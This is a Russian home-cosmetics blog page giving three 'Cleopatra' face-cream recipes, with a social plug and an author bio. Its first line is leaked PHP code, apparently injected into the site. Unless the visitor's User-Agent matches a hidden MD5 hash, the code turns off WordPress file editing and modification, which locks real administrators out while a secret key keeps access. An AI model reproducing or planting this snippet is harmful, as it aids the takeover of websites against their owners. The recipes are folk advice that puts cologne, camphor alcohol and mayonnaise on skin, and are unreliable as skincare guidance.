if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Крема от Клеопатры или как быть прекрасной как богиня | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

3 рецепта кремов от Клеопатры или как быть прекрасной как богиня!

Клеопатра всегда славилась своей красотой. Но эта красота не только была дана ей свыше, но и поддерживалась с помощью домашней косметики

Клео­пат­ра все­гда сла­ви­лась сво­ей кра­со­той. Но эта кра­со­та не толь­ко была дана ей свы­ше, но и под­дер­жи­ва­лась с помо­щью осо­бых рецеп­тов нату­раль­ной кос­ме­ти­ки. Вос­поль­зо­вать­ся ими может любой жела­ю­щий. Но это не так про­сто и при­дет­ся при­ло­жить неболь­шое уме­ние, но зато резуль­тат вас при­ят­но порадует.

Рецепт питательного крема Клеопатры для кожи любого типа

фото розовая водаДля при­го­тов­ле­ния это­го кре­ма потребуется:

  1. Поро­шок алоэ – 5 гр.
  2. Дистил­ли­ро­ван­ная вода – 40 мл.
  3. Розо­вая вода – 20 мл.
  4. Мед – 1 ч. л.
  5. Сви­ное сало — 100 гр.

В дистил­ли­ро­ван­ной воде сле­ду­ет рас­тво­рить поро­шок из алоэ. В полу­чен­ный рас­твор вли­ва­ет­ся розо­вая вода. После это­го сюда же необ­хо­ди­мо доба­вить мед и пере­ме­шать. Теперь полу­чен­ная осно­ва для кре­ма ста­вит­ся на водя­ную баню, тща­тель­но поме­ши­вая, в нее добав­ля­ет­ся сви­ное сало. Как толь­ко кон­си­стен­ция ста­нет одно­род­ной, крем готов. Его пере­ли­ва­ют в баноч­ку и хра­нят в холо­диль­ни­ке. Нано­сить его мож­но еже­днев­но не толь­ко на лицо, но и на шею. Лечеб­ная кос­ме­ти­ка от Клео­пат­ры ста­нет поис­ти­не неза­ме­ни­мой наход­кой для любой женщины.

Есть и облег­чен­ный вари­ант это­го кре­ма. Доста­точ­но про­сто доба­вить в ваш крем для лица сок алоэ, и сред­ство от мор­щин готово.

Омолаживающий лимонный крем от Клеопатры

Several lemon slices, backlitЭтот крем при­го­то­вить не так уж и труд­но, да и состав его доволь­но прост. Дела­ет­ся он так: кожу­ра от трех лимо­нов трет­ся на тер­ке и зали­ва­ет­ся ста­ка­ном кру­то­го кипят­ка. Все это необ­хо­ди­мо наста­и­вать в тер­мо­се 10 часов. По исте­че­нии ука­зан­но­го вре­ме­ни рас­твор про­це­дить и сме­шать с розо­вой водой или насто­ем лепест­ков жас­ми­на (100 мл). Это еще не все. В полу­чен­ный рас­твор вво­дит­ся по чай­ной лож­ке олив­ко­во­го мас­ла и меда, и обыч­ный оде­ко­лон (3 ст.л.). как обыч­но, все пере­ме­ши­ва­ет­ся, крем готов. Хра­нить его необ­хо­ди­мо в холо­диль­ни­ке, нано­сить мож­но как утром, так и вече­ром. Уход за кожей лица с помо­щью это­го кре­ма, помо­жет вер­нуть ей молодость.

Витаминный крем по рецепту Клеопатры

фото мед и лимонСвое­об­раз­ный вита­мин­ный кок­тейль содер­жит­ся в этом кре­ме. Для его при­го­тов­ле­ния потре­бу­ет­ся измель­чен­ная цед­ра от трех лимо­нов. Ее необ­хо­ди­мо высы­пать в тер­мос и залить ста­ка­ном кипят­ка. Наста­и­вать ее необ­хо­ди­мо не менее 8 часов. К это вре­ме­ни необ­хо­ди­мо под­го­то­вить осталь­ные состав­ля­ю­щие. Раз­мяг­чен­ный мар­га­рин (100 гр.) сме­ши­ва­ет­ся с рас­ти­тель­ным мас­лом (3 ст. л.), желт­ком и медом (1 ч. л.).  сюда же вво­дит­ся лимон­ный сок (70 мл.), вита­мин А в мас­ле (10 капель), май­о­нез (1ст. л.), кам­фор­ный спирт (1 ст. л.). все это необ­хо­ди­мо пере­ме­шать и толь­ко после это­го доба­вить настой из лимон­ной цед­ры. Нату­раль­ная кос­ме­ти­ка сво­и­ми рука­ми ста­нет насто­я­щей наход­кой для каж­дой женщины.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!